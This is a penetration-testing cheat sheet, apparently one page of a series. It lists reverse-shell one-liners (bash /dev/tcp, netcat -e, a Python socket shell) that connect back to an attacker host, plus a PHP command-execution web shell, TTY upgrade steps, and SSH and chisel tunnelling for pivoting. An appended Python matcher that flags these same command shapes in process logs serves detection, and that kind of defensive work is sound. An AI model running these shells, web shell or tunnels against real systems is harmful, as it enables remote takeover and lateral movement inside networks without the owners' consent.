🐚 Shells and Tunnels

Commands to get reverse shells, upgrade them, and pivot within networks.

➡️ Environment: See 00_environment_setup


🔙 Reverse Shells

Bash:

bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1

Netcat:

nc -e /bin/bash $LHOST $LPORT

PHP (web shell; runs the cmd query parameter rather than connecting back):

<?php system($_GET['cmd']); ?>

Python:

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("$LHOST",$LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh"])'

🔼 Shell Upgrade

python3 -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z (a keypress, not a command) to background the shell
stty raw -echo; fg
export TERM=xterm-256color

🔀 Port Forwarding

SSH:

ssh -L 8080:localhost:80 user@$IP
ssh -R 9001:127.0.0.1:22 user@$IP

Chisel:

Start on attacker:

chisel server -p 8000 --reverse

On target:

chisel client $LHOST:8000 R:1080:127.0.0.1:3389

🛡️ SOCKS Proxy

proxychains nmap -sT -Pn 127.0.0.1 -p 80
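
Detection view of the commands on this page, as an added example that is not part of the original cheat sheet: a small matcher that flags these command shapes in process-execution records. The user|parent|cmdline record format, the rule patterns and the sample records are assumptions constructed for this example.

```python
import re

# Signatures for the command shapes listed on this page (patterns are
# assumptions written for this example, not a vetted rule set).
RULES = [
    ("bash /dev/tcp redirect", re.compile(r"/dev/tcp/\S+/\d+")),
    ("netcat -e exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*sh\b")),
    ("python socket+dup2", re.compile(r"\bpython[\d.]*\s+-c\s.*socket.*dup2")),
    ("pty.spawn tty upgrade", re.compile(r"pty\.spawn\(")),
    ("ssh port forward", re.compile(r"\bssh\b.*\s-[LR]\s*\d+:")),
    ("chisel tunnel", re.compile(r"\bchisel\s+(?:server|client)\b")),
    ("proxychains wrapper", re.compile(r"\bproxychains4?\s+\S+")),
]
# A shell whose parent is a web server is how a PHP system($_GET['cmd'])
# web shell shows up in process telemetry.
WEB_PARENTS = {"apache2", "httpd", "nginx", "php-fpm"}
SHELLS = {"sh", "bash", "dash"}

def classify(record):
    """Return findings for one 'user|parent|cmdline' record (constructed format)."""
    # maxsplit=2 keeps any '|' inside the command line intact.
    _user, parent, cmd = (f.strip() for f in record.split("|", 2))
    findings = [label for label, rx in RULES if rx.search(cmd)]
    argv0 = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
    if parent in WEB_PARENTS and argv0 in SHELLS:
        findings.append("shell spawned by web server")
    return findings

def scan(records):
    """Map each suspicious record to its findings; clean records are omitted."""
    return {r: f for r in records if (f := classify(r))}

# Constructed sample records; addresses are from documentation ranges.
SAMPLE = [
    "www-data|apache2|sh -c id",
    "www-data|sh|bash -c bash -i >& /dev/tcp/192.0.2.10/4444 0>&1",
    "www-data|sh|nc -e /bin/bash 192.0.2.10 4444",
    'www-data|bash|python3 -c import pty; pty.spawn("/bin/bash")',
    "alice|bash|ssh -L 8080:localhost:80 user@198.51.100.7",
    "alice|bash|ssh user@198.51.100.7",
    "bob|bash|chisel client 192.0.2.10:8000 R:1080:127.0.0.1:3389",
    "root|cron|python3 /usr/local/bin/backup.py",
]

if __name__ == "__main__":
    for record, findings in scan(SAMPLE).items():
        print(f"{', '.join(findings):32} {record}")
```

Command-line matching alone is easy to evade by renaming binaries or encoding arguments, so the parent/child check and network egress telemetry carry more weight than any single pattern.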

Next: 04_linux_privilege_escalation